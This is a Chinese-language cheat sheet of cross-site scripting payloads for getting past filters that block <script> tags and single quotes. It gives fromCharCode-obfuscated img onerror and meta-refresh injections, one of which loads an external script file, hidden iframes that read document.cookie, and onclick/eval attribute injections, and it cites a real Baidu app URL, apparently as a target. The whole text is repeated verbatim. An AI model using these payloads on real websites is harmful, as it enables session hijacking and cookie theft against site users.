在网页过滤了<script和单引号的情况下可以使用代码
"><img src="" οnerrοr="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))">
绕过,上面write中内容输出的结果是<script>alert(1)</script>
遇到过滤<script>无法调用js的时候也可以用类似的代码突破
"><meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>
上面代码是跳转url到javascript:document.write("<script src=xxx></script>")
也就是调用js文件xxx
"><iframe src=javascript:alert(document.cookie); />
"><iframe src=javascript:alert(document.cookie); height=0 width=0 />
简要描述:和前面的不一样的时,有时候,输出会出现在HTML标签的属性之中。
例如: <input value="输出"> 、 <img οnlοad="...[输出]..."> ,再比如 <body style="...[输出]..."> .. 这个时候怎么办呢?
οnclick="alert(1)
οnclick='alert(1) 没过滤单引号就可以的
οnclick='eval(js转码)'
转换js为eval中可用加载的模式。
http://app.baidu.com/app/enter?appid=280383&qq-pf-to=pcqq.c2c
"><img src="" οnerrοr="document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62)+String.fromCharCode(97)+String.fromCharCode(108)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(116)+String.fromCharCode(40)+String.fromCharCode(49)+String.fromCharCode(41)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))">
绕过,上面write中内容输出的结果是<script>alert(1)</script>
遇到过滤<script>无法调用js的时候也可以用类似的代码突破
"><meta http-equiv="Refresh" content="0;url=javascript:document.write(String.fromCharCode(60)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(32)+String.fromCharCode(115)+String.fromCharCode(114)+String.fromCharCode(99)+String.fromCharCode(61)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(120)+String.fromCharCode(62)+String.fromCharCode(60)+String.fromCharCode(47)+String.fromCharCode(115)+String.fromCharCode(99)+String.fromCharCode(114)+String.fromCharCode(105)+String.fromCharCode(112)+String.fromCharCode(116)+String.fromCharCode(62))>
上面代码是跳转url到javascript:document.write("<script src=xxx></script>")
也就是调用js文件xxx
"><iframe src=javascript:alert(document.cookie); />
"><iframe src=javascript:alert(document.cookie); height=0 width=0 />
简要描述:和前面的不一样的时,有时候,输出会出现在HTML标签的属性之中。
例如: <input value="输出"> 、 <img οnlοad="...[输出]..."> ,再比如 <body style="...[输出]..."> .. 这个时候怎么办呢?
οnclick="alert(1)
οnclick='alert(1) 没过滤单引号就可以的
οnclick='eval(js转码)'
转换js为eval中可用加载的模式。
http://app.baidu.com/app/enter?appid=280383&qq-pf-to=pcqq.c2c